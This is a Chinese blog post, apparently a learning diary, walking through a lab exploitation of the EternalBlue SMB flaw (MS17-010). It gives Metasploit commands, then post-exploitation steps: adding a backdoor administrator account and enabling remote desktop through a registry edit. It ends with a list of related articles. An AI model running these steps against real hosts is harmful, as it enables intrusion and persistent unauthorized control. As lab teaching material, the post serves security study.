网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)

已于 2023-03-10 11:53:53 修改
阅读量1.4k 收藏 12
点赞数
分类专栏: 远程代码执行 文章标签: 学习 安全 网络
于 2023-03-10 10:30:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xyc_0/article/details/129436049
版权

一、漏洞原理简介

MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。

函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。

二、漏洞发现

  1. 扫描本网段存活的主机

nmap -T4 -sS -sC -sV 192.168.180.0/24

这里我们发现靶机开启445端口,而我们ms17-010利用的就是445端口的SMB服务

三、测试漏洞

1、打开kali中msfconsole漏洞测试平台

  1. 搜索ms17-010漏洞测试模块

search ms17-010

3、我们使用kali中的漏洞验证模块,验证靶机是否存在ms17-010漏洞

use 3

4、查看该模块需要配置的参数

show options

5、设置靶机IP

set RHOSTS 192.168.180.129

6、运行漏洞验证模块

run

验证成功发现目标靶机存在ms17-010漏洞

7、进行渗透测试

使用漏洞攻击模块

use exploit/windows/smb/ms17_010_eternalblue

8、设置靶机IP

set RHOSTS 192.168.180.129

9、运行漏洞攻击模块

run

成功拿到靶机shell

四、漏洞利用

我们可以使用该漏洞做很多事情,这里简单演示通过shell对靶机进行远程控制

1、创建一个新用户

这里我们创建了一个用户名为user密码为P@ssw0rd的用户

2、对user用户提权,添加到超级管理员组

net localgroup administrators user /add

3、开启远程桌面

我们先查看靶机3389端口开启情况

netstat -ano

这里没有看到3389端口开启,我们手动开启

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

再次查看端口开启情况

发现已经开启

4、连接远程桌面

rdesktop 192.168.180.129:3389

我们用刚刚创建的user用户登录

登录成功,实验结束

漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
李火火的安全圈
03-07 8946
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
Windows - SMB 远程代码执行漏洞永恒之蓝- CVE-2017-0146 & MS17-010
最新发布
Blue17 の 小窝
03-22 1095
永恒之蓝漏洞MS 17-010
CVE-2017-0143
龙卷风摧毁停车场
03-13 868
漏洞出现在 Windows SMB v1 的内核态函数 srv!SrvOs2FeaListToNt 处理 FEA(File Extended Attributes) 转换时,在 Large Non-Paged Kernel Pool 上存在缓冲区溢出函数 srv!SrvOs2FeaListToNt 将 FEA list 转换成 NTFEA(Windows NT FEA) list 前调用 srv!
MS17-010远程溢出CVE-2017-0143
p_utao的博客
09-03 2309
漏洞介绍 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大
远程溢出攻击
野生码农
01-24 4641
网络安全介绍 https://wenku.baidu.com/view/df861fd101f69e3142329427.html   远程溢出攻击   什么是远程溢出攻击? https://zhidao.baidu.com/question/537606563.html   大多溢出攻击都是针对缓冲区的溢出。当缓冲区溢出时,过剩的信息对电脑内存中原有内容进行完全替换,如未进行备份...
CVE-2017-0143(远程溢出)漏洞复现
Ch_an_ger的博客
06-19 6934
一、漏洞原理 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算
方程式工具-永恒之蓝 Windows 2008 r2 安装补丁
04-12
【1】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0143)(方程式工具-永恒之蓝)[原理扫描] 【2】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0144)(方程式工具-永恒之蓝)[原理扫描] 【3】Microsoft Windows SMB...
Windows Server 2008 R2 Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010)
友人A的博客
06-10 5378
漏洞提示 漏洞详情
81-81.渗透测试-永恒之蓝利用原理和方法CVE-2017-0144.mp4
05-10
81-81.渗透测试-永恒之蓝利用原理和方法CVE-2017-0144.mp4
CVE-2017-0143永恒之蓝复现
Welcome To Myon'Blog !
12-22 627
CVE-2017-0143永恒之蓝复现 漏洞复现 永恒之蓝 win7漏洞 kali渗透
远程溢出漏洞利用程序
06-08
远程溢出工具非常好用的!应该会与很多人用到的。360会查。使用请关了360.
IIS ISAPI Printer远程溢出攻击
微软NET专栏
05-23 2926
国产.printer远程溢出攻击软件使用实例 1、小榕的IIS5Exploit 严格地说,这软件并不是小榕写的,这软件是小榕根据jill.c改编优化部分代 码编译出来的。不过这软件确实很好,特别推荐大家使用。 下载地址http://www.netxeyes.com/IIS5Exploit.zip 压缩包里含有三个文件IIS5Exploit.exe、nc.exe、readme.txt IIS5 .P
远程缓冲器溢出攻击
12-20 339
实验平台:Fedora Core 4 (做实验的必备利器平台,很好很强大,也可以用来学习鸟哥的linux私房菜,现在网上都不好找了) http://archives.fedoraproject.org/pub/archive/fedora/linux/core/4/i386/iso/ 这是官方的,相当给力,在网上还没有消失 前提:去掉操作系统的堆栈执行保护和内存随机化机制 sys...
MS17-010远程溢出漏洞(永恒之蓝)
小小猪的博客
06-10 476
MS17-010远程溢出漏洞(永恒之蓝) 实验环境 操作机:kali 2017 操作机IP:172.16.11.2 目标机:windows7 目标机IP:172.16.12.2 打开nmap进行扫描目标主机开放哪些端口 终端打开msfconsole 使用search 命令查找ms17-010漏洞相关模块 使用use 命令选择我们要使用的扫描模块 在运行模块之前,需要设置相关选项,我们使用show options 查看配置信息 需要设置目标地址,设置命令 设..
RPC服务远程溢出漏洞攻击
qq_43776408的博客
01-04 4472
RPC(Remote Procedure Call, 远程过程调用)是操作系统的一种消息传递功能 微软的描述为:“一种能允许分布式应用程序调用网络上不同计算机的可用服务的消息传递实用程序。在计算机的远程管理期间使用” ////////////////////////////////// 攻击RPC漏洞其实就是攻击DCOM接口 二者相关联 那什么是DCOM接口? DCOM(分布式组件对象模型...
Linux远程溢出攻击,Linux下基本栈溢出攻击
weixin_32884263的博客
05-07 377
1.1 Linux栈溢出保护机制基本的栈溢出攻击,是最早产生的一种缓冲区溢出攻击方法,它是所有其他缓冲区溢出攻击的基础。但是,由于这种攻击方法产生的时间比较长,故而GCC编译器、Linux操作系统提供了一些机制来阻止这种攻击方法对系统产生危害。下面首先了解一下现有的用于保护堆栈的机制以及关闭相应保护机制的方法,为进一步分析基本栈溢出提供了良好的实验环境。1. 内存地址随机化机制在...
网络空间安全赛题解析-通过系统远程溢出控制目标主机
君逍遥o
06-04 308
溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞 因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞
永恒之蓝 MS17-010 远程溢出漏洞复现
weixin_66146598的博客
06-07 1176
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。......
远程溢出实验
qq_43717119的博客
06-22 2019
远程溢出 【实验目的】 1、掌握远程溢出的基本原理; 2、掌握实现远程溢出的基本手段。 【实验环境】 同学A:运行server.exe 同学B:运行exploit.exe(命令格式:exploit.exe ipaddress 8888) 备注:同学A、B分别登录windows靶机,运行程序在D盘->攻防工具包->远程溢出 【实验预备知识点】 远程缓冲区溢出原理和本地缓冲区溢出原理一样,不同之处在于远程缓冲区溢出需要利用套接口进行远程连接。本小节通过一个例子来分析远程缓冲区溢出的工作原理和攻击过程
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值